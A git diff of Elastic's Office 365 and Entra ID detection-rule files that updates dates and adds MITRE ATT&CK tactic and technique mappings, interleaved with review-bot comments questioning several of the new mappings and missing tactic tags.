"2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -75,10 +75,12 @@ event.dataset:o365.audit and event.provider:Exchange and event.action:Set-Mailbo [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" 
@@ -89,9 +91,20 @@ id = "T1562.008" name = "Disable or Modify Cloud Logs" reference = "https://attack.mitre.org/techniques/T1562/008/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml b/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml index 9b65cad7179..c42fdc66200 100644 --- a/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml +++ b/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,14 +84,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml b/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml index aeb5c15781c..c8313e37974 100644 --- a/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml 
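Review bot: The new Persistence/T1098 block maps the mailbox audit bypass cmdlet (the query fragment `event.action:Set-Mailbo…` visible in the earlier hunk header) to Account Manipulation, but the cmdlet changes an auditing attribute rather than granting or preserving access, and the hunk gives no sub-technique or rationale. If the intent is that an attacker exempts a compromised mailbox from auditing so it can keep being used quietly, that outcome is still Defense Evasion and is already covered by T1562.008 in the block above; I'd either remove the Persistence block or add a sentence to the rule `note` explaining the persistence angle. If it stays, `"Tactic: Persistence"` must be added to `tags`, which no hunk for this file does.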
+++ b/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,14 +83,23 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_new_inbox_rule_delete_or_move.toml b/rules/integrations/o365/defense_evasion_exchange_new_inbox_rule_delete_or_move.toml index 146cb01f008..b902db463ca 100644 --- a/rules/integrations/o365/defense_evasion_exchange_new_inbox_rule_delete_or_move.toml +++ b/rules/integrations/o365/defense_evasion_exchange_new_inbox_rule_delete_or_move.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/22" integration = ["o365"] maturity = "production" -updated_date = "2026/01/29" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Jamie Lee", "Marco Pedrinazzi"] 
@@ -119,22 +119,39 @@ event.dataset: "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" + [[rule.threat.technique.subtechnique]] id = "T1564.008" name = "Email Hiding Rules" reference = "https://attack.mitre.org/techniques/T1564/008/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1137" +name = "Office Application Startup" +reference = "https://attack.mitre.org/techniques/T1137/" + +[[rule.threat.technique.subtechnique]] +id = "T1137.005" +name = "Outlook Rules" +reference = "https://attack.mitre.org/techniques/T1137/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["user.id", "source.ip"] diff --git a/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml b/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml index 42f4af5cf54..36613ec061d 100644 --- a/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml +++ b/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
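Review bot: T1137.005 Outlook Rules covers rules that trigger code execution when a crafted message arrives (Ruler-style persistence), not rules that delete or move mail; the behaviour this rule detects is already correctly mapped to T1564.008 Email Hiding Rules in the block above. Unless the query (outside this hunk) also matches rule actions that launch applications, the new Persistence/T1137.005 block mis-describes the detection and should be removed, or the rule `note` should explain why a delete/move rule is treated as persistence. If it is kept, `"Tactic: Persistence"` has to be added to `tags`, which this patch does not do for this file.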
@@ -83,14 +83,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_mfa_notification_email_deleted.toml b/rules/integrations/o365/defense_evasion_mfa_notification_email_deleted.toml index 60c6d104619..a059221e92f 100644 --- a/rules/integrations/o365/defense_evasion_mfa_notification_email_deleted.toml +++ b/rules/integrations/o365/defense_evasion_mfa_notification_email_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/25" integration = ["o365"] maturity = "production" -updated_date = "2026/02/25" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -106,17 +106,36 @@ web where event.dataset == "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" + [[rule.threat.technique.subtechnique]] id = "T1070.008" name = "Clear Mailbox Data" reference = "https://attack.mitre.org/techniques/T1070/008/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.005" +name = "Device Registration" +reference = "https://attack.mitre.org/techniques/T1098/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml b/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml index 7b81c5b2bd0..8d5e9e22b20 100644 --- a/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml +++ b/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/27" integration = ["o365"] maturity = "production" -updated_date = "2026/02/27" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] 
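Review bot: The new T1098.005 Device Registration block describes the action the deleted notification presumably announced, not the deletion the rule observes, and which notification subjects the query matches is outside this hunk; if those notifications cover any security-info change (new authenticator app, phone number, passkey), T1556.006 Multi-Factor Authentication is the closer technique than Device Registration. Either way the rationale belongs in the rule `note`, since a reader of the threat block alone will expect the rule to see a device-registration event rather than a mailbox deletion. Adding the Persistence tactic also requires `"Tactic: Persistence"` in `tags`, which no hunk for this file touches.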
@@ -107,10 +107,17 @@ event.dataset: "o365.audit" and event.provider: ("SharePoint" or "OneDrive") and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" @@ -120,4 +127,3 @@ reference = "https://attack.mitre.org/techniques/T1562/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml b/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml index 98575d9075a..9353dbcbee6 100644 --- a/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml +++ b/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/30" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,14 +80,18 @@ o365.audit.NewValue:True and event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml b/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml index a83611522d5..570299d5b44 100644 
--- a/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml +++ b/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/30" integration = ["o365"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,14 +78,18 @@ o365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml b/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml index cc943708bc7..b236dee5b22 100644 --- a/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml +++ b/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -78,14 +78,31 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1537" name = "Transfer Data to Cloud Account" reference = "https://attack.mitre.org/techniques/T1537/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1114" +name = "Email Collection" +reference = "https://attack.mitre.org/techniques/T1114/" + +[[rule.threat.technique.subtechnique]] +id = "T1114.003" +name = "Email Forwarding Rule" +reference = "https://attack.mitre.org/techniques/T1114/003/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml b/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml index ed1b40e8736..8ab9e702ec7 100644 --- a/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml +++ b/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -79,14 +79,31 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1537" name = "Transfer Data to Cloud Account" reference = "https://attack.mitre.org/techniques/T1537/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/o365/impact_security_compliance_potential_ransomware_activity.toml b/rules/integrations/o365/impact_security_compliance_potential_ransomware_activity.toml index 2a6f4711e02..3cd8b3f6c63 100644 --- a/rules/integrations/o365/impact_security_compliance_potential_ransomware_activity.toml +++ b/rules/integrations/o365/impact_security_compliance_potential_ransomware_activity.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/15" integration = ["o365"] maturity = "production" -updated_date = "2026/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] 
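Review bot: The transport-rule creation and modification rules now diverge: the previous hunk gives creation a Collection/T1114.003 Email Forwarding Rule block while this hunk gives modification a Defense Evasion/T1562.001 block, yet a rule modification (presumably `Set-TransportRule`) can add the same forwarding/BCC action and a rule creation can equally bypass filtering, so the sibling pair should carry the same secondary mappings. I'd add the T1114.003 Collection block to this rule and, if T1562.001 is warranted at all, the Defense Evasion block to the creation rule, so analysts pivoting between the two get consistent ATT&CK coverage. Each added tactic also needs its matching `Tactic: …` entry in the rule's `tags`, which neither hunk updates.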
@@ -86,14 +86,23 @@ event.dataset:o365.audit and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1486" name = "Data Encrypted for Impact" reference = "https://attack.mitre.org/techniques/T1486/" +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/integrations/o365/initial_access_entra_id_portal_login_impossible_travel.toml b/rules/integrations/o365/initial_access_entra_id_portal_login_impossible_travel.toml index f38c9c8e7ab..0ce83d4a339 100644 --- a/rules/integrations/o365/initial_access_entra_id_portal_login_impossible_travel.toml +++ b/rules/integrations/o365/initial_access_entra_id_portal_login_impossible_travel.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/04" integration = ["o365"] maturity = "production" -updated_date = "2025/10/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -93,22 +93,39 @@ event.dataset:o365.audit and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml b/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml index 50995758898..a593f424e70 100644 --- a/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml +++ b/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/24" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -102,34 +102,47 @@ event.dataset: "o365.audit" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml index f97a3f4fe2b..72c07c33077 100644 --- a/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml +++ b/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["o365"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -141,29 +141,46 @@ event.dataset: "o365.audit" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml b/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml index bf11a1e50c2..f448ef4d4f1 100644 --- a/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml +++ b/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["o365"] maturity = "production" -updated_date = "2026/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] 
@@ -103,27 +103,49 @@ event.dataset:o365.audit
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
-
 [[rule.threat.technique]]
 id = "T1566"
 name = "Phishing"
 reference = "https://attack.mitre.org/techniques/T1566/"
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1528"
+name = "Steal Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1528/"
+
+[[rule.threat.technique]]
+id = "T1606"
+name = "Forge Web Credentials"
+reference = "https://attack.mitre.org/techniques/T1606/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1606.002"
+name = "SAML Tokens"
+reference = "https://attack.mitre.org/techniques/T1606/002/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["o365.audit.UserId", "o365.audit.ErrorNumber"]
diff --git a/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml b/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml
index 1768e604eac..6a188c194de 100644
--- a/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml
+++ b/rules/integrations/o365/persistence_entra_id_global_administrator_role_assign.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/01/06"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -87,19 +87,36 @@ event.dataset:o365.audit
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/o365/persistence_exchange_management_role_assignment.toml b/rules/integrations/o365/persistence_exchange_management_role_assignment.toml
index 3618f364ed9..bb5accb60cd 100644
--- a/rules/integrations/o365/persistence_exchange_management_role_assignment.toml
+++ b/rules/integrations/o365/persistence_exchange_management_role_assignment.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/20"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -84,18 +84,36 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml b/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml
index 71b93df4cac..268f01b506b 100644
--- a/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml
+++ b/rules/integrations/o365/persistence_exchange_suspicious_mailbox_permission_delegation.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/05/17"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -116,22 +116,39 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1098.002"
 name = "Additional Email Delegate Permissions"
 reference = "https://attack.mitre.org/techniques/T1098/002/"
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.002"
+name = "Additional Email Delegate Permissions"
+reference = "https://attack.mitre.org/techniques/T1098/002/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["o365.audit.UserId"]
diff --git a/rules/integrations/o365/persistence_teams_guest_access_enabled.toml b/rules/integrations/o365/persistence_teams_guest_access_enabled.toml
index ef65532a6c5..7e3c706e1f9 100644
--- a/rules/integrations/o365/persistence_teams_guest_access_enabled.toml
+++ b/rules/integrations/o365/persistence_teams_guest_access_enabled.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/20"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2026/02/11"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -78,14 +78,26 @@ o365.audit.Parameters.AllowGuestUser:True and event.outcome:success
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1484"
+name = "Domain or Tenant Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml b/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml
index 6b821fb7bfe..51e1c706f72 100644
--- a/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml
+++ b/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/05/17"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/24"
 [rule]
 author = ["Austin Songer"]
@@ -83,19 +83,36 @@ event.outcome:success
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1484"
 name = "Domain or Tenant Policy Modification"
 reference = "https://attack.mitre.org/techniques/T1484/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1484.002"
 name = "Trust Modification"
 reference = "https://attack.mitre.org/techniques/T1484/002/"
-
-
 [rule.threat.tactic]
 id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1484"
+name = "Domain or Tenant Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/"
+
+[[rule.threat.technique.subtechnique]]
